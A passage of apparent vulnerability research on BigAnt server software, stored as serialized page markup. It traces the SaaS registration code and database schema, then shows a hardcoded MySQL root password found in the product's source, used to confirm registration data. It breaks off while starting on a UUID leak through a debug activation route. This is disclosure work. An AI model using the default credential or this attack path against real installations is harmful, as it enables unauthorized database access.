}",[1373,47507,4762],{"class":4636},[1373,47509,8904],{"class":1383},[1373,47511,47512,47514,47516,47518,47520,47522,47524,47526,47529,47531],{"class":1375,"line":7615},[1373,47513,47475],{"class":34505},[1373,47515,4667],{"class":1397},[1373,47517,10265],{"class":7297},[1373,47519,34467],{"class":1383},[1373,47521,47190],{"class":4640},[1373,47523,7035],{"class":1383},[1373,47525,1388],{"class":1387},[1373,47527,47528],{"class":1391},"err_msg",[1373,47530,1388],{"class":1387},[1373,47532,34850],{"class":1383},[1373,47534,47535],{"class":1375,"line":7635},[1373,47536,9861],{"class":1383},[1373,47538,47539,47541,47543],{"class":1375,"line":7640},[1373,47540,28032],{"class":1383},[1373,47542,4762],{"class":4636},[1373,47544,8904],{"class":1383},[1373,47546,47547,47550,47552,47554,47556,47558,47560,47563],{"class":1375,"line":7648},[1373,47548,47549],{"class":34505}," $this",[1373,47551,4667],{"class":1397},[1373,47553,10265],{"class":7297},[1373,47555,34467],{"class":1383},[1373,47557,47367],{"class":4640},[1373,47559,4667],{"class":1397},[1373,47561,47562],{"class":7297},"getError",[1373,47564,16360],{"class":1383},[1373,47566,47567],{"class":1375,"line":7672},[1373,47568,4795],{"class":1383},[1373,47570,47571],{"class":1375,"line":7688},[1373,47572,1855],{"class":1383},[18,47574,47575,47576,982,47579,47582,47583,47585,47586,47589,47590,47592,47593,47596,47597,47599],{},"Based on some light ThinkPHP knowledge, we know that the application utilizes a ",[886,47577,47578],{},"create()",[886,47580,47581],{},"add()"," inheritance to handle creation of database objects. After the email is sent the user is redirected to a ",[886,47584,47170],{}," route and calls the function in ",[886,47587,47588],{},"Application\u002FHome\u002FController\u002FSaasController.class.php"," with the registration ",[886,47591,6946],{}," request to ",[886,47594,47595],{},"\u002Findex.php\u002FHome\u002FSaas\u002Freg_saas",". The following snippet completes the account registration step and creates the ",[886,47598,47076],{}," and updates the database:",[1354,47601,47603],{"className":1367,"code":47602,"language":1369,"meta":219,"style":219},"\u002F**\n * 注册SAAS\n * @param number $status\n * @param number $is_send_activation_email 是否发送激活邮件(官方注册,外面发送)\n * @return number|unknown\n *\u002F\nfunction reg_saas($status = 0,$is_send_activation_email = 1){\n \n $M = D('Common\u002FSaas');\n\n $M->is_send_activation_email = $is_send_activation_email ;\n \n \u002F\u002F清除过期无效的数据\n $M->clearExpire();\n \n\n $data = $M->create();\n\n if (!$data){\n return sp_api_fail(0, $M->getError()) ;\n }\n \n $data['saas_status'] = $status ;\n $res = $M->add($data);\n\n \u002F\u002F更新接口服务\n if ($res && $status){\n $param = $M->where(array('saas_name'=>$data['saas_name']))->field('saas_id')->find();\n \\Common\\Lib\\AntCmd::execUpdatePack(CMD_SAAS_UPDATE, $param['saas_id']) ;\n }\n \n if ($res){\n return sp_api_success($data);\n }else{\n return sp_api_fail(0, $M->getError()) ;\n }\n \n \n}\n",[886,47604,47605,47609,47614,47630,47641,47656,47660,47687,47691,47714,47718,47736,47740,47745,47758,47762,47766,47786,47790,47804,47829,47833,47837,47862,47884,47888,47893,47909,47978,48029,48033,48037,48047,48060,48068,48092,48096,48100,48104],{"__ignoreMap":219},[1373,47606,47607],{"class":1375,"line":1376},[1373,47608,47086],{"class":4630},[1373,47610,47611],{"class":1375,"line":220},[1373,47612,47613],{"class":4630}," * 注册SAAS\n",[1373,47615,47616,47619,47623,47627],{"class":1375,"line":1266},[1373,47617,47618],{"class":4630}," * ",[1373,47620,47622],{"class":47621},"s41CE","@param",[1373,47624,47626],{"class":47625},"s6MXs"," number",[1373,47628,47629],{"class":4630}," $status\n",[1373,47631,47632,47634,47636,47638],{"class":1375,"line":1852},[1373,47633,47618],{"class":4630},[1373,47635,47622],{"class":47621},[1373,47637,47626],{"class":47625},[1373,47639,47640],{"class":4630}," $is_send_activation_email 是否发送激活邮件(官方注册,外面发送)\n",[1373,47642,47643,47645,47648,47650,47653],{"class":1375,"line":4692},[1373,47644,47618],{"class":4630},[1373,47646,47647],{"class":47621},"@return",[1373,47649,47626],{"class":47625},[1373,47651,17472],{"class":47652},"sNSxj",[1373,47654,47655],{"class":47625},"unknown\n",[1373,47657,47658],{"class":1375,"line":4724},[1373,47659,47111],{"class":4630},[1373,47661,47662,47664,47667,47669,47672,47674,47676,47678,47681,47683,47685],{"class":1375,"line":4756},[1373,47663,8560],{"class":7293},[1373,47665,47666],{"class":7297}," reg_saas",[1373,47668,34467],{"class":1383},[1373,47670,47671],{"class":4640},"status ",[1373,47673,5417],{"class":1397},[1373,47675,5557],{"class":5467},[1373,47677,47335],{"class":1383},[1373,47679,47680],{"class":4640},"is_send_activation_email ",[1373,47682,5417],{"class":1397},[1373,47684,5468],{"class":5467},[1373,47686,47430],{"class":1383},[1373,47688,47689],{"class":1375,"line":4768},[1373,47690,47181],{"class":4640},[1373,47692,47693,47695,47698,47700,47703,47705,47707,47710,47712],{"class":1375,"line":4792},[1373,47694,7362],{"class":1383},[1373,47696,47697],{"class":4640},"M ",[1373,47699,5417],{"class":1397},[1373,47701,47702],{"class":7297}," D",[1373,47704,1384],{"class":1383},[1373,47706,1388],{"class":1387},[1373,47708,47709],{"class":1391},"Common\u002FSaas",[1373,47711,1388],{"class":1387},[1373,47713,4680],{"class":1383},[1373,47715,47716],{"class":1375,"line":4798},[1373,47717,6520],{"emptyLinePlaceholder":237},[1373,47719,47720,47722,47724,47726,47728,47730,47732,47734],{"class":1375,"line":4806},[1373,47721,7362],{"class":1383},[1373,47723,47367],{"class":4640},[1373,47725,4667],{"class":1397},[1373,47727,47680],{"class":4640},[1373,47729,5417],{"class":1397},[1373,47731,4656],{"class":1383},[1373,47733,47680],{"class":4640},[1373,47735,4912],{"class":1383},[1373,47737,47738],{"class":1375,"line":4817},[1373,47739,47181],{"class":4640},[1373,47741,47742],{"class":1375,"line":4825},[1373,47743,47744],{"class":4630}," \u002F\u002F清除过期无效的数据\n",[1373,47746,47747,47749,47751,47753,47756],{"class":1375,"line":4835},[1373,47748,7362],{"class":1383},[1373,47750,47367],{"class":4640},[1373,47752,4667],{"class":1397},[1373,47754,47755],{"class":7297},"clearExpire",[1373,47757,15603],{"class":1383},[1373,47759,47760],{"class":1375,"line":4843},[1373,47761,47181],{"class":4640},[1373,47763,47764],{"class":1375,"line":4849},[1373,47765,6520],{"emptyLinePlaceholder":237},[1373,47767,47768,47770,47773,47775,47777,47779,47781,47784],{"class":1375,"line":4877},[1373,47769,7362],{"class":1383},[1373,47771,47772],{"class":4640},"data ",[1373,47774,5417],{"class":1397},[1373,47776,4656],{"class":1383},[1373,47778,47367],{"class":4640},[1373,47780,4667],{"class":1397},[1373,47782,47783],{"class":7297},"create",[1373,47785,15603],{"class":1383},[1373,47787,47788],{"class":1375,"line":4915},[1373,47789,6520],{"emptyLinePlaceholder":237},[1373,47791,47792,47794,47796,47798,47800,47802],{"class":1375,"line":4931},[1373,47793,4695],{"class":4636},[1373,47795,4641],{"class":1383},[1373,47797,16090],{"class":1397},[1373,47799,4644],{"class":1383},[1373,47801,9156],{"class":4640},[1373,47803,47430],{"class":1383},[1373,47805,47806,47808,47811,47813,47815,47817,47819,47821,47823,47825,47827],{"class":1375,"line":4947},[1373,47807,4918],{"class":4636},[1373,47809,47810],{"class":7297}," sp_api_fail",[1373,47812,1384],{"class":1383},[1373,47814,445],{"class":5467},[1373,47816,5437],{"class":1383},[1373,47818,4656],{"class":1383},[1373,47820,47367],{"class":4640},[1373,47822,4667],{"class":1397},[1373,47824,47562],{"class":7297},[1373,47826,27831],{"class":1383},[1373,47828,47289],{"class":1383},[1373,47830,47831],{"class":1375,"line":4952},[1373,47832,4795],{"class":1383},[1373,47834,47835],{"class":1375,"line":6776},[1373,47836,47181],{"class":4640},[1373,47838,47839,47841,47843,47845,47847,47850,47852,47854,47856,47858,47860],{"class":1375,"line":6781},[1373,47840,7362],{"class":1383},[1373,47842,9156],{"class":4640},[1373,47844,7035],{"class":1383},[1373,47846,1388],{"class":1387},[1373,47848,47849],{"class":1391},"saas_status",[1373,47851,1388],{"class":1387},[1373,47853,15050],{"class":1383},[1373,47855,8575],{"class":1397},[1373,47857,4656],{"class":1383},[1373,47859,47671],{"class":4640},[1373,47861,4912],{"class":1383},[1373,47863,47864,47866,47868,47870,47872,47874,47876,47878,47880,47882],{"class":1375,"line":7524},[1373,47865,7362],{"class":1383},[1373,47867,47161],{"class":4640},[1373,47869,5417],{"class":1397},[1373,47871,4656],{"class":1383},[1373,47873,47367],{"class":4640},[1373,47875,4667],{"class":1397},[1373,47877,27649],{"class":7297},[1373,47879,34467],{"class":1383},[1373,47881,9156],{"class":4640},[1373,47883,4680],{"class":1383},[1373,47885,47886],{"class":1375,"line":7530},[1373,47887,6520],{"emptyLinePlaceholder":237},[1373,47889,47890],{"class":1375,"line":7546},[1373,47891,47892],{"class":4630}," \u002F\u002F更新接口服务\n",[1373,47894,47895,47897,47899,47901,47903,47905,47907],{"class":1375,"line":7571},[1373,47896,4695],{"class":4636},[1373,47898,47425],{"class":1383},[1373,47900,47161],{"class":4640},[1373,47902,16504],{"class":1397},[1373,47904,4656],{"class":1383},[1373,47906,9216],{"class":4640},[1373,47908,47430],{"class":1383},[1373,47910,47911,47913,47916,47918,47920,47922,47924,47927,47929,47931,47933,47935,47937,47939,47941,47943,47945,47947,47949,47951,47953,47956,47958,47961,47963,47965,47967,47969,47971,47973,47976],{"class":1375,"line":7598},[1373,47912,4727],{"class":1383},[1373,47914,47915],{"class":4640},"param ",[1373,47917,5417],{"class":1397},[1373,47919,4656],{"class":1383},[1373,47921,47367],{"class":4640},[1373,47923,4667],{"class":1397},[1373,47925,47926],{"class":7297},"where",[1373,47928,1384],{"class":1383},[1373,47930,47234],{"class":1379},[1373,47932,1384],{"class":1383},[1373,47934,1388],{"class":1387},[1373,47936,46826],{"class":1391},[1373,47938,1388],{"class":1387},[1373,47940,47245],{"class":1397},[1373,47942,4644],{"class":1383},[1373,47944,9156],{"class":4640},[1373,47946,7035],{"class":1383},[1373,47948,1388],{"class":1387},[1373,47950,46826],{"class":1391},[1373,47952,1388],{"class":1387},[1373,47954,47955],{"class":1383},"]))",[1373,47957,4667],{"class":1397},[1373,47959,47960],{"class":7297},"field",[1373,47962,1384],{"class":1383},[1373,47964,1388],{"class":1387},[1373,47966,47076],{"class":1391},[1373,47968,1388],{"class":1387},[1373,47970,2230],{"class":1383},[1373,47972,4667],{"class":1397},[1373,47974,47975],{"class":7297},"find",[1373,47977,15603],{"class":1383},[1373,47979,47980,47984,47987,47990,47993,47995,47998,48001,48004,48006,48009,48011,48013,48016,48018,48020,48022,48024,48027],{"class":1375,"line":7615},[1373,47981,47983],{"class":47982},"sv8o3"," \\",[1373,47985,47986],{"class":9383},"Common",[1373,47988,47989],{"class":47982},"\\",[1373,47991,47992],{"class":9383},"Lib",[1373,47994,47989],{"class":47982},[1373,47996,47997],{"class":9165},"AntCmd",[1373,47999,48000],{"class":1397},"::",[1373,48002,48003],{"class":7297},"execUpdatePack",[1373,48005,1384],{"class":1383},[1373,48007,48008],{"class":2326},"CMD_SAAS_UPDATE",[1373,48010,5437],{"class":1383},[1373,48012,4656],{"class":1383},[1373,48014,48015],{"class":4640},"param",[1373,48017,7035],{"class":1383},[1373,48019,1388],{"class":1387},[1373,48021,47076],{"class":1391},[1373,48023,1388],{"class":1387},[1373,48025,48026],{"class":1383},"])",[1373,48028,47289],{"class":1383},[1373,48030,48031],{"class":1375,"line":7635},[1373,48032,4795],{"class":1383},[1373,48034,48035],{"class":1375,"line":7640},[1373,48036,47181],{"class":4640},[1373,48038,48039,48041,48043,48045],{"class":1375,"line":7648},[1373,48040,4695],{"class":4636},[1373,48042,47425],{"class":1383},[1373,48044,47190],{"class":4640},[1373,48046,47430],{"class":1383},[1373,48048,48049,48051,48054,48056,48058],{"class":1375,"line":7672},[1373,48050,4918],{"class":4636},[1373,48052,48053],{"class":7297}," sp_api_success",[1373,48055,34467],{"class":1383},[1373,48057,9156],{"class":4640},[1373,48059,4680],{"class":1383},[1373,48061,48062,48064,48066],{"class":1375,"line":7688},[1373,48063,28032],{"class":1383},[1373,48065,4762],{"class":4636},[1373,48067,8904],{"class":1383},[1373,48069,48070,48072,48074,48076,48078,48080,48082,48084,48086,48088,48090],{"class":1375,"line":7709},[1373,48071,4918],{"class":4636},[1373,48073,47810],{"class":7297},[1373,48075,1384],{"class":1383},[1373,48077,445],{"class":5467},[1373,48079,5437],{"class":1383},[1373,48081,4656],{"class":1383},[1373,48083,47367],{"class":4640},[1373,48085,4667],{"class":1397},[1373,48087,47562],{"class":7297},[1373,48089,27831],{"class":1383},[1373,48091,47289],{"class":1383},[1373,48093,48094],{"class":1375,"line":7714},[1373,48095,4795],{"class":1383},[1373,48097,48098],{"class":1375,"line":7722},[1373,48099,47181],{"class":4640},[1373,48101,48102],{"class":1375,"line":9903},[1373,48103,47181],{"class":4640},[1373,48105,48106],{"class":1375,"line":9908},[1373,48107,1855],{"class":1383},[18,48109,48110,48111,48114,48115,48118],{},"There's a lot more ThinkPHP logic that handles the MVC components that wasn't worth stepping through, so when in doubt ",[886,48112,48113],{},"ripgrep",". A quick search and a validation that the default install provides a MySQL server landed me at the ",[886,48116,48117],{},"Application\u002FInstall\u002FData\u002Fdbcreate\u002Fms_mysql.sql"," install SQL file:",[1354,48120,48122],{"className":5372,"code":48121,"language":5374,"meta":219,"style":219},"-- ----------------------------\n-- Table structure for sys_saas\n-- ----------------------------\nDROP TABLE IF EXISTS `sys_saas`;\nCREATE TABLE `sys_saas` (\n `SAAS_ID` varchar(50) NOT NULL DEFAULT '',\n `SAAS_NAME` varchar(100) DEFAULT '',\n `SAAS_SHOWNAME` varchar(100) DEFAULT '',\n `SAAS_DBNAME` varchar(50) DEFAULT '',\n `SAAS_DESC` varchar(255) DEFAULT '',\n `SAAS_CREATE_DATE` bigint(20) DEFAULT '0',\n `SAAS_STATUS` int(2) DEFAULT '0',\n `ORG_CONTACT` varchar(50) DEFAULT '',\n `ORG_PHONE` varchar(50) DEFAULT '',\n `ORG_ADDRESS` varchar(255) DEFAULT '',\n `ORG_EMAIL` varchar(50) DEFAULT '',\n `ORG_FAX` varchar(50) DEFAULT '',\n `ORG_POSTCODE` varchar(50) DEFAULT '',\n `AUTH_NUMBERS` varchar(100) DEFAULT '0',\n `AUTH_CODE` varchar(2000) DEFAULT '',\n `AUTH_EXPIREDATE` varchar(255) DEFAULT '0',\n `SAAS_PWD` varchar(50) DEFAULT '',\n `SAAS_INSTALLDATE` varchar(255) DEFAULT '',\n PRIMARY KEY (`SAAS_ID`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n",[886,48123,48124,48129,48134,48138,48161,48175,48206,48231,48254,48277,48301,48329,48357,48380,48403,48426,48449,48472,48495,48522,48546,48573,48596,48619,48634],{"__ignoreMap":219},[1373,48125,48126],{"class":1375,"line":1376},[1373,48127,48128],{"class":4630},"-- ----------------------------\n",[1373,48130,48131],{"class":1375,"line":220},[1373,48132,48133],{"class":4630},"-- Table structure for sys_saas\n",[1373,48135,48136],{"class":1375,"line":1266},[1373,48137,48128],{"class":4630},[1373,48139,48140,48143,48146,48149,48152,48154,48157,48159],{"class":1375,"line":1852},[1373,48141,48142],{"class":5387},"DROP",[1373,48144,48145],{"class":5387}," TABLE",[1373,48147,48148],{"class":5387}," IF",[1373,48150,48151],{"class":5387}," EXISTS",[1373,48153,19163],{"class":1387},[1373,48155,48156],{"class":1391},"sys_saas",[1373,48158,19169],{"class":1387},[1373,48160,4912],{"class":4640},[1373,48162,48163,48166,48168,48170,48172],{"class":1375,"line":4692},[1373,48164,48165],{"class":5387},"CREATE",[1373,48167,48145],{"class":5387},[1373,48169,19163],{"class":4640},[1373,48171,48156],{"class":7297},[1373,48173,48174],{"class":4640},"` (\n",[1373,48176,48177,48180,48183,48185,48188,48190,48193,48196,48199,48202,48204],{"class":1375,"line":4724},[1373,48178,48179],{"class":1387}," `",[1373,48181,48182],{"class":1391},"SAAS_ID",[1373,48184,19169],{"class":1387},[1373,48186,48187],{"class":7293}," varchar",[1373,48189,1384],{"class":4640},[1373,48191,48192],{"class":5467},"50",[1373,48194,48195],{"class":4640},") ",[1373,48197,48198],{"class":5387},"NOT NULL",[1373,48200,48201],{"class":4652}," DEFAULT",[1373,48203,5571],{"class":1387},[1373,48205,9062],{"class":4640},[1373,48207,48208,48210,48213,48215,48217,48219,48222,48224,48227,48229],{"class":1375,"line":4756},[1373,48209,48179],{"class":1387},[1373,48211,48212],{"class":1391},"SAAS_NAME",[1373,48214,19169],{"class":1387},[1373,48216,48187],{"class":7293},[1373,48218,1384],{"class":4640},[1373,48220,48221],{"class":5467},"100",[1373,48223,48195],{"class":4640},[1373,48225,48226],{"class":4652},"DEFAULT",[1373,48228,5571],{"class":1387},[1373,48230,9062],{"class":4640},[1373,48232,48233,48235,48238,48240,48242,48244,48246,48248,48250,48252],{"class":1375,"line":4768},[1373,48234,48179],{"class":1387},[1373,48236,48237],{"class":1391},"SAAS_SHOWNAME",[1373,48239,19169],{"class":1387},[1373,48241,48187],{"class":7293},[1373,48243,1384],{"class":4640},[1373,48245,48221],{"class":5467},[1373,48247,48195],{"class":4640},[1373,48249,48226],{"class":4652},[1373,48251,5571],{"class":1387},[1373,48253,9062],{"class":4640},[1373,48255,48256,48258,48261,48263,48265,48267,48269,48271,48273,48275],{"class":1375,"line":4792},[1373,48257,48179],{"class":1387},[1373,48259,48260],{"class":1391},"SAAS_DBNAME",[1373,48262,19169],{"class":1387},[1373,48264,48187],{"class":7293},[1373,48266,1384],{"class":4640},[1373,48268,48192],{"class":5467},[1373,48270,48195],{"class":4640},[1373,48272,48226],{"class":4652},[1373,48274,5571],{"class":1387},[1373,48276,9062],{"class":4640},[1373,48278,48279,48281,48284,48286,48288,48290,48293,48295,48297,48299],{"class":1375,"line":4798},[1373,48280,48179],{"class":1387},[1373,48282,48283],{"class":1391},"SAAS_DESC",[1373,48285,19169],{"class":1387},[1373,48287,48187],{"class":7293},[1373,48289,1384],{"class":4640},[1373,48291,48292],{"class":5467},"255",[1373,48294,48195],{"class":4640},[1373,48296,48226],{"class":4652},[1373,48298,5571],{"class":1387},[1373,48300,9062],{"class":4640},[1373,48302,48303,48305,48308,48310,48313,48315,48317,48319,48321,48323,48325,48327],{"class":1375,"line":4806},[1373,48304,48179],{"class":1387},[1373,48306,48307],{"class":1391},"SAAS_CREATE_DATE",[1373,48309,19169],{"class":1387},[1373,48311,48312],{"class":7293}," bigint",[1373,48314,1384],{"class":4640},[1373,48316,36929],{"class":5467},[1373,48318,48195],{"class":4640},[1373,48320,48226],{"class":4652},[1373,48322,4713],{"class":1387},[1373,48324,445],{"class":1391},[1373,48326,1388],{"class":1387},[1373,48328,9062],{"class":4640},[1373,48330,48331,48333,48336,48338,48341,48343,48345,48347,48349,48351,48353,48355],{"class":1375,"line":4817},[1373,48332,48179],{"class":1387},[1373,48334,48335],{"class":1391},"SAAS_STATUS",[1373,48337,19169],{"class":1387},[1373,48339,48340],{"class":7293}," int",[1373,48342,1384],{"class":4640},[1373,48344,353],{"class":5467},[1373,48346,48195],{"class":4640},[1373,48348,48226],{"class":4652},[1373,48350,4713],{"class":1387},[1373,48352,445],{"class":1391},[1373,48354,1388],{"class":1387},[1373,48356,9062],{"class":4640},[1373,48358,48359,48361,48364,48366,48368,48370,48372,48374,48376,48378],{"class":1375,"line":4825},[1373,48360,48179],{"class":1387},[1373,48362,48363],{"class":1391},"ORG_CONTACT",[1373,48365,19169],{"class":1387},[1373,48367,48187],{"class":7293},[1373,48369,1384],{"class":4640},[1373,48371,48192],{"class":5467},[1373,48373,48195],{"class":4640},[1373,48375,48226],{"class":4652},[1373,48377,5571],{"class":1387},[1373,48379,9062],{"class":4640},[1373,48381,48382,48384,48387,48389,48391,48393,48395,48397,48399,48401],{"class":1375,"line":4835},[1373,48383,48179],{"class":1387},[1373,48385,48386],{"class":1391},"ORG_PHONE",[1373,48388,19169],{"class":1387},[1373,48390,48187],{"class":7293},[1373,48392,1384],{"class":4640},[1373,48394,48192],{"class":5467},[1373,48396,48195],{"class":4640},[1373,48398,48226],{"class":4652},[1373,48400,5571],{"class":1387},[1373,48402,9062],{"class":4640},[1373,48404,48405,48407,48410,48412,48414,48416,48418,48420,48422,48424],{"class":1375,"line":4843},[1373,48406,48179],{"class":1387},[1373,48408,48409],{"class":1391},"ORG_ADDRESS",[1373,48411,19169],{"class":1387},[1373,48413,48187],{"class":7293},[1373,48415,1384],{"class":4640},[1373,48417,48292],{"class":5467},[1373,48419,48195],{"class":4640},[1373,48421,48226],{"class":4652},[1373,48423,5571],{"class":1387},[1373,48425,9062],{"class":4640},[1373,48427,48428,48430,48433,48435,48437,48439,48441,48443,48445,48447],{"class":1375,"line":4849},[1373,48429,48179],{"class":1387},[1373,48431,48432],{"class":1391},"ORG_EMAIL",[1373,48434,19169],{"class":1387},[1373,48436,48187],{"class":7293},[1373,48438,1384],{"class":4640},[1373,48440,48192],{"class":5467},[1373,48442,48195],{"class":4640},[1373,48444,48226],{"class":4652},[1373,48446,5571],{"class":1387},[1373,48448,9062],{"class":4640},[1373,48450,48451,48453,48456,48458,48460,48462,48464,48466,48468,48470],{"class":1375,"line":4877},[1373,48452,48179],{"class":1387},[1373,48454,48455],{"class":1391},"ORG_FAX",[1373,48457,19169],{"class":1387},[1373,48459,48187],{"class":7293},[1373,48461,1384],{"class":4640},[1373,48463,48192],{"class":5467},[1373,48465,48195],{"class":4640},[1373,48467,48226],{"class":4652},[1373,48469,5571],{"class":1387},[1373,48471,9062],{"class":4640},[1373,48473,48474,48476,48479,48481,48483,48485,48487,48489,48491,48493],{"class":1375,"line":4915},[1373,48475,48179],{"class":1387},[1373,48477,48478],{"class":1391},"ORG_POSTCODE",[1373,48480,19169],{"class":1387},[1373,48482,48187],{"class":7293},[1373,48484,1384],{"class":4640},[1373,48486,48192],{"class":5467},[1373,48488,48195],{"class":4640},[1373,48490,48226],{"class":4652},[1373,48492,5571],{"class":1387},[1373,48494,9062],{"class":4640},[1373,48496,48497,48499,48502,48504,48506,48508,48510,48512,48514,48516,48518,48520],{"class":1375,"line":4931},[1373,48498,48179],{"class":1387},[1373,48500,48501],{"class":1391},"AUTH_NUMBERS",[1373,48503,19169],{"class":1387},[1373,48505,48187],{"class":7293},[1373,48507,1384],{"class":4640},[1373,48509,48221],{"class":5467},[1373,48511,48195],{"class":4640},[1373,48513,48226],{"class":4652},[1373,48515,4713],{"class":1387},[1373,48517,445],{"class":1391},[1373,48519,1388],{"class":1387},[1373,48521,9062],{"class":4640},[1373,48523,48524,48526,48529,48531,48533,48535,48538,48540,48542,48544],{"class":1375,"line":4947},[1373,48525,48179],{"class":1387},[1373,48527,48528],{"class":1391},"AUTH_CODE",[1373,48530,19169],{"class":1387},[1373,48532,48187],{"class":7293},[1373,48534,1384],{"class":4640},[1373,48536,48537],{"class":5467},"2000",[1373,48539,48195],{"class":4640},[1373,48541,48226],{"class":4652},[1373,48543,5571],{"class":1387},[1373,48545,9062],{"class":4640},[1373,48547,48548,48550,48553,48555,48557,48559,48561,48563,48565,48567,48569,48571],{"class":1375,"line":4952},[1373,48549,48179],{"class":1387},[1373,48551,48552],{"class":1391},"AUTH_EXPIREDATE",[1373,48554,19169],{"class":1387},[1373,48556,48187],{"class":7293},[1373,48558,1384],{"class":4640},[1373,48560,48292],{"class":5467},[1373,48562,48195],{"class":4640},[1373,48564,48226],{"class":4652},[1373,48566,4713],{"class":1387},[1373,48568,445],{"class":1391},[1373,48570,1388],{"class":1387},[1373,48572,9062],{"class":4640},[1373,48574,48575,48577,48580,48582,48584,48586,48588,48590,48592,48594],{"class":1375,"line":6776},[1373,48576,48179],{"class":1387},[1373,48578,48579],{"class":1391},"SAAS_PWD",[1373,48581,19169],{"class":1387},[1373,48583,48187],{"class":7293},[1373,48585,1384],{"class":4640},[1373,48587,48192],{"class":5467},[1373,48589,48195],{"class":4640},[1373,48591,48226],{"class":4652},[1373,48593,5571],{"class":1387},[1373,48595,9062],{"class":4640},[1373,48597,48598,48600,48603,48605,48607,48609,48611,48613,48615,48617],{"class":1375,"line":6781},[1373,48599,48179],{"class":1387},[1373,48601,48602],{"class":1391},"SAAS_INSTALLDATE",[1373,48604,19169],{"class":1387},[1373,48606,48187],{"class":7293},[1373,48608,1384],{"class":4640},[1373,48610,48292],{"class":5467},[1373,48612,48195],{"class":4640},[1373,48614,48226],{"class":4652},[1373,48616,5571],{"class":1387},[1373,48618,9062],{"class":4640},[1373,48620,48621,48624,48626,48628,48630,48632],{"class":1375,"line":7524},[1373,48622,48623],{"class":4652}," PRIMARY KEY",[1373,48625,4641],{"class":4640},[1373,48627,19169],{"class":1387},[1373,48629,48182],{"class":1391},[1373,48631,19169],{"class":1387},[1373,48633,11875],{"class":4640},[1373,48635,48636,48639,48641,48644,48646,48649,48651],{"class":1375,"line":7530},[1373,48637,48638],{"class":4640},") ENGINE",[1373,48640,5417],{"class":1397},[1373,48642,48643],{"class":4640},"InnoDB ",[1373,48645,48226],{"class":4652},[1373,48647,48648],{"class":4640}," CHARSET",[1373,48650,5417],{"class":1397},[1373,48652,48653],{"class":4640},"utf8;\n",[18,48655,48656],{},"Great, now we have the corresponding table that handles SaaS registration and we just need to verify that our data is in the database. Another quick little grep for the MySQL connection string shows the following:",[1354,48658,48660],{"className":1367,"code":48659,"language":1369,"meta":219,"style":219},"Demo\u002FController\u002FTestController.class.php\n29: $dbconfig['DB_TYPE']='mysql' ;\n55: $conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n85: \u002F\u002F$conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n214: \u002F\u002Fvar_dump(function_exists('mysql_connect'));\n",[886,48661,48662,48686,48720,48794,48804],{"__ignoreMap":219},[1373,48663,48664,48667,48669,48672,48674,48677,48679,48681,48683],{"class":1375,"line":1376},[1373,48665,48666],{"class":2326},"Demo",[1373,48668,2180],{"class":1397},[1373,48670,48671],{"class":2326},"Controller",[1373,48673,2180],{"class":1397},[1373,48675,48676],{"class":2326},"TestController",[1373,48678,59],{"class":1397},[1373,48680,27318],{"class":7293},[1373,48682,59],{"class":1397},[1373,48684,48685],{"class":2326},"php\n",[1373,48687,48688,48691,48693,48695,48698,48700,48702,48705,48707,48709,48711,48713,48716,48718],{"class":1375,"line":220},[1373,48689,48690],{"class":5467},"29",[1373,48692,4606],{"class":1383},[1373,48694,35280],{"class":1383},[1373,48696,48697],{"class":4640},"dbconfig",[1373,48699,7035],{"class":1383},[1373,48701,1388],{"class":1387},[1373,48703,48704],{"class":1391},"DB_TYPE",[1373,48706,1388],{"class":1387},[1373,48708,15050],{"class":1383},[1373,48710,5417],{"class":1397},[1373,48712,1388],{"class":1387},[1373,48714,48715],{"class":1391},"mysql",[1373,48717,1388],{"class":1387},[1373,48719,47289],{"class":1383},[1373,48721,48722,48725,48727,48729,48732,48734,48736,48739,48741,48743,48745,48747,48749,48751,48754,48756,48758,48760,48763,48765,48767,48769,48772,48774,48776,48778,48781,48783,48785,48787,48790,48792],{"class":1375,"line":1266},[1373,48723,48724],{"class":5467},"55",[1373,48726,4606],{"class":1383},[1373,48728,35280],{"class":1383},[1373,48730,48731],{"class":4640},"conns",[1373,48733,7124],{"class":1383},[1373,48735,8575],{"class":1397},[1373,48737,48738],{"class":1379}," array",[1373,48740,1384],{"class":1383},[1373,48742,1388],{"class":1387},[1373,48744,48715],{"class":1391},[1373,48746,1388],{"class":1387},[1373,48748,5437],{"class":1383},[1373,48750,1388],{"class":1387},[1373,48752,48753],{"class":1391},"127.0.0.1",[1373,48755,1388],{"class":1387},[1373,48757,5437],{"class":1383},[1373,48759,1388],{"class":1387},[1373,48761,48762],{"class":1391},"3306",[1373,48764,1388],{"class":1387},[1373,48766,5437],{"class":1383},[1373,48768,1388],{"class":1387},[1373,48770,48771],{"class":1391},"root",[1373,48773,1388],{"class":1387},[1373,48775,5437],{"class":1383},[1373,48777,1388],{"class":1387},[1373,48779,48780],{"class":1391},"www.upsoft01.com",[1373,48782,1388],{"class":1387},[1373,48784,5437],{"class":1383},[1373,48786,1388],{"class":1387},[1373,48788,48789],{"class":1391},"antdbms_aipu",[1373,48791,1388],{"class":1387},[1373,48793,4680],{"class":1383},[1373,48795,48796,48799,48801],{"class":1375,"line":1852},[1373,48797,48798],{"class":5467},"85",[1373,48800,4606],{"class":1383},[1373,48802,48803],{"class":4630}," \u002F\u002F$conns[] = array('mysql','127.0.0.1','3306','root','www.upsoft01.com','antdbms_aipu');\n",[1373,48805,48806,48809,48811],{"class":1375,"line":4692},[1373,48807,48808],{"class":5467},"214",[1373,48810,4606],{"class":1383},[1373,48812,48813],{"class":4630}," \u002F\u002Fvar_dump(function_exists('mysql_connect'));\n",[18,48815,48816,48817,48820],{},"Sure enough, a quick MySQL connection on the server later with ",[886,48818,48819],{},"root:www.upsoft01.com"," and we can see the following entries for the table:",[18,48822,48823],{},[68,48824],{"alt":48825,"src":48826,":width":10862},"BigAnt registration sys_saas database entries","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-3-saas-registration-db.png",[18,48828,48829,48830,48832],{},"This validates that the entries are actually be created with the data we provided, and shows that we need to figure out a way to get access to the ",[886,48831,48182],{}," value. It's also important to note the multiple UUIDs and SaaS organizations, as it will come up later when we mature the exploit.",[61,48834,48836],{"id":48835},"debug-activation-uuid-leak","Debug Activation UUID Leak",[18,48838,48839,48840,1554,48843,48846,48847,48850,48851,48854],{},"A quick glance through the application logic shows that we need to look for instances where ",[886,48841,48842],{},"$_SESSION['saas']",[886,48844,48845],{},"sp_saas_id()"," is called and accessible by a user or unauthenticated in order for us to recover the UUID. The 